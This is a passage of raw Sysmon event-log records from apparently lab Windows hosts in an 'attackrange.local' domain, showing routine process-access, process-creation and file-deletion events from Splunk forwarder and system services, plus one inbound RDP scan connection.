14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049666Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049665Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049664Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049663Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049662Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049661Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EB42-607E-D906-00000000BB01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049660Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB42-607E-D906-00000000BB01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049659Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-EB42-607E-D906-00000000BB01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000064960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:58.093{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53569-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.611{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FFBABD7A3D845682F01A967EB30D914,SHA256=C45BEDBED80E8932ACEE46F1E86F6FB73FB6BC65F58DE645C9710D19B3157F11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000064958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB43-607E-770B-00000000BB01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB43-607E-770B-00000000BB01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000064952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.205{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB43-607E-770B-00000000BB01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000064951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:59.206{A7A01FEF-EB43-607E-770B-00000000BB01}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049677Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:59.608{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0EA6BE8DCC4E8F5C12D836DD9534DCDC,SHA256=CF3EA1C970EC42FB5ADB286F768C5364EAD9A1D2E6330A52A5F4E54E87196BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049676Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:59.014{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64842322C39D63B8D535C07D97F2752E,SHA256=53596770B4042B136B3FCFD6573B9B3FB078A5FF1306A5D966A4B3807C34672A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049675Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:59.014{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD47A553C9184C9B21CE7287DB38AFD9,SHA256=0E64D74D7709637AAAAA3C2FF127F2BD6D4F590BEB7011615C910CF413890CD4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000064982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB44-607E-790B-00000000BB01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000064977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB44-607E-790B-00000000BB01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000064976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.955{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB44-607E-790B-00000000BB01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000064975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:00.956{A7A01FEF-EB44-607E-790B-00000000BB01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program 